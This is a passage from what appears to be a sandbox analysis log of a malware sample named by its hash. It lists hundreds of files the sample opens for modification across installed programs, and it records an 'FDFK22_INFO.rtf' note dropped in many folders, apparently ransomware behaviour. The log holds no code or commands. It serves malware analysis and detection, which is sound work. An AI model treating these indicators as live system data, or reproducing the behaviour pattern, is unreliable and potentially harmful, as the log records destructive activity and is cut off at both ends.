Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ml.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh87 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Krasnoyarsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbynet.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\ZoneInfoMappings a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mexico_City a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nome a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Antigua a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santiago a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Gaza a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_pwa_launcher.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guayaquil a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\net.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\javaws.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rainy_River a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\browser\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\nb.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Troll a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\icudtl.dat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Chita a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Cairo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Halifax a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sw.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ndjamena a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Costa_Rica a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\ConnectSelect.dib a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Noumea a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\en-US.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Anchorage a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Resolute a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chihuahua a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\ApproveProtect.mht a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ko.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dushanbe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Maputo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ant-javafx.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program 